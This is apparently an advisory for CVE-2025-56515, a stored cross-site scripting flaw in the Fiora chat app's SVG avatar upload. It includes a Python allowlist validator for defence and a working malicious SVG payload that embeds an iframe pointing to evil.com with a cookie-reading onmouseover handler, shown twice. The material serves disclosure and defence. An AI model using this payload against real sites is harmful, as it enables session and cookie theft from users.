
CVE-2025-56515 PoC — Fiora Security Vulnerability

Source
Associated Vulnerability
Title: Fiora Security Vulnerability (CVE-2025-56515)
Description: File upload vulnerability in Fiora chat application 1.0.0 through user avatar upload functionality. The application fails to validate SVG file content, allowing malicious SVG files with embedded foreignObject elements containing iframe tags and JavaScript event handlers (onmouseover) to be uploaded and stored. When rendered, these SVG files execute arbitrary JavaScript, enabling attackers to steal user sessions, cookies, and perform unauthorized actions in the context of users viewing affected profiles.
# CVE-2025-56515: Cross-Site Scripting (XSS) Vulnerability in Fiora Chat Application

## Vulnerability Overview
**CVE ID**: CVE-2025-56515  
**Vulnerability Type**: Cross-Site Scripting (XSS)  
**Attack Type**: Remote  
**Impact**: Code Execution  
**Affected Product**: Fiora Chat Application (Version 1.0.0)  
**Vendor**: suisuijiang  
**Discoverer**: Kaio Mendonça Pereira  
**Vendor Confirmed**: Yes  
**References**:  
- [Fiora GitHub Repository](https://github.com/yinxin630/fiora)  
- [Fiora Application](https://fiora.suisuijiang.com/)  
- [CWE-79: Improper Neutralization of Input During Web Page Generation](https://cwe.mitre.org/data/definitions/79.html)

## Description
The Fiora chat application (version 1.0.0) is vulnerable to a Cross-Site Scripting (XSS) attack due to improper validation of SVG file content uploaded through the user avatar modification functionality. Authenticated users can upload malicious SVG files containing embedded `<foreignObject>` elements with `<iframe>` tags and JavaScript event handlers (e.g., `onmouseover`). When these SVG files are rendered in the browser, the embedded JavaScript executes, allowing attackers to steal user sessions, cookies, or perform unauthorized actions in the context of users viewing the affected profile.

## Affected Components
- `packages/server/src/routes/user.ts`
- `packages/web/src/modules/Sidebar/UserInfo.tsx`
- `packages/web/src/service.ts`
- `packages/web/src/components/Avatar.tsx`
- `/UserAvatar/` directory
- Function: `changeUserAvatar`

## Attack Vector
The vulnerability is exploited by uploading a malicious SVG file as a user avatar. The SVG file can include a `<foreignObject>` element containing an `<iframe>` with a JavaScript event handler, such as `onmouseover="alert(document.cookie)"`. When the avatar is rendered (e.g., on page reload or direct access to the SVG URL), the malicious JavaScript executes, bypassing the application's XSS protections. This enables attackers to perform actions such as:
- Stealing session cookies.
- Performing unauthorized actions in the context of the victim's session.
- Redirecting users to malicious sites.
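A server-side allowlist check that rejects the constructs described above (`<foreignObject>`, non-SVG-namespace elements such as `<iframe>`, `on*` event handlers, and non-fragment `href` references) before an uploaded avatar is stored. This is an added example, not Fiora's own code; the function name `svg_upload_problems` and the two embedded sample files are constructed for this illustration.

```python
"""Allowlist validator for SVG avatar uploads (added example, not Fiora's code)."""
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"

# Only plain drawing primitives are accepted; foreignObject, script, a, image etc. are not.
ALLOWED_ELEMENTS = {
    "svg", "g", "defs", "title", "desc", "path", "rect", "circle", "ellipse",
    "line", "polyline", "polygon", "text", "tspan", "linearGradient",
    "radialGradient", "stop", "clipPath", "use",
}
# Reference-carrying attributes; only same-document fragments (#id) are accepted.
HREF_ATTRS = {"href", f"{{{XLINK_NS}}}href"}

# Constructed sample inputs: the advisory's PoC payload and a harmless avatar.
POC_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <foreignObject x="0" y="0" width="100" height="100">
    <iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
  </foreignObject>
  <text x="0" y="15"></text>
</svg>"""
SAFE_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="40" fill="#3c8"/></svg>'


def _split(tag: str) -> tuple[str, str]:
    """Split an ElementTree name '{ns}local' into (ns, local)."""
    if tag.startswith("{"):
        ns, local = tag[1:].split("}", 1)
        return ns, local
    return "", tag


def svg_upload_problems(data: bytes) -> list[str]:
    """Return the reasons an SVG upload must be rejected (empty list == accept)."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    problems: list[str] = []
    for el in root.iter():  # walks every element, including nested foreign content
        ns, local = _split(el.tag)
        if ns != SVG_NS:
            problems.append(f"element <{local}> outside the SVG namespace ({ns or 'none'})")
        elif local not in ALLOWED_ELEMENTS:
            problems.append(f"element <{local}> not in allowlist")
        for attr, value in el.attrib.items():
            _, aname = _split(attr)
            if aname.lower().startswith("on"):
                problems.append(f"event handler attribute {aname} on <{local}>")
            elif attr in HREF_ATTRS and not value.strip().startswith("#"):
                problems.append(f"external or scheme reference in {aname} on <{local}>")
            elif "javascript:" in value.replace(" ", "").lower():
                problems.append(f"javascript: URL in attribute {aname} on <{local}>")
    return problems
```

Run on the PoC payload this reports three findings (`<foreignObject>` not in the allowlist, `<iframe>` outside the SVG namespace, and the `onmouseover` handler) and accepts the plain circle; pairing the upload check with a restrictive `Content-Security-Policy` on the `/UserAvatar/` path covers the direct-URL rendering case the advisory mentions.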

### Example Malicious SVG Payload
```xml
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 100 100">
  <foreignObject x="0" y="0" width="100" height="100">
    <iframe xmlns="http://www.w3.org/1999/xhtml" src="https://evil.com" onmouseover="alert(document.cookie)" width="100" height="100"></iframe>
  </foreignObject>
  <text x="0" y="15"></text>
</svg>
```